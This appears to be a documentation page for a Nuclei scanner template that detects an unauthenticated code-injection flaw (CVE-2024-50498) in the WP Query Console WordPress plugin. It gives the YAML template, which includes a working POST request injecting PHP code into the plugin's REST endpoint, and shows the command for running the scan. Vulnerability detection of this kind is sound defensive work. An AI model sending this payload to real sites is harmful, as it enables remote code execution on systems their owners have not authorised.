Skip to content
Nuclei Templates

WP Query Console <= 1.0 - Remote Code Execution

ID: CVE-2024-50498

Severity: critical

Author: s4e-io

Tags: cve,cve2024,wp,wordpress,wp-plugin,wp-query-console,rce

Description

Section titled “Description”

Improper Control of Generation of Code (‘Code Injection’) vulnerability in LUBUS WP Query Console allows Code Injection.This issue affects WP Query Console- from n/a through 1.0.

YAML Source

Section titled “YAML Source”
id: CVE-2024-50498


info:
  name: WP Query Console <= 1.0 - Remote Code Execution
  author: s4e-io
  severity: critical
  description: |
    Improper Control of Generation of Code ('Code Injection') vulnerability in LUBUS WP Query Console allows Code Injection.This issue affects WP Query Console- from n/a through 1.0.
  reference:
    - https://github.com/RandomRobbieBF/CVE-2024-50498
    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-query-console/wp-query-console-10-unauthenticated-remote-code-execution
    - https://patchstack.com/database/vulnerability/wp-query-console/wordpress-wp-query-console-plugin-1-0-remote-code-execution-rce-vulnerability?_s_id=cve
    - https://nvd.nist.gov/vuln/detail/CVE-2024-50498
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2024-50498
    cwe-id: CWE-94
    epss-score: 0.00513
    epss-percentile: 0.77296
    cpe: cpe:2.3:a:lubus:wp_query_console:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: lubus
    product: wp_query_console
    framework: wordpress
    fofa-query: body="wp-content/plugins/wp-query-console/"
  tags: cve,cve2024,wp,wordpress,wp-plugin,wp-query-console,rce


http:
  - raw:
      - |
        POST /index.php?rest_route=/wqc/v1/query HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json


        {"queryArgs":"phpinfo();","queryType":"post"}


    matchers:
      - type: dsl
        dsl:
          - 'contains_all(body, "PHP Extension", "PHP Version")'
          - 'contains(content_type, "application/json")'
          - "status_code == 200"
        condition: and
# digest: 4a0a00473045022100ea737d74080d71ab89040fac49cf7d222ecfeafd4ec596702eb8161ac2d698270220540db776bac72f00d95ab44918b82214b70f32b40ffe1c8e8b5ff49904737670:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2024/CVE-2024-50498.yaml"

View on Github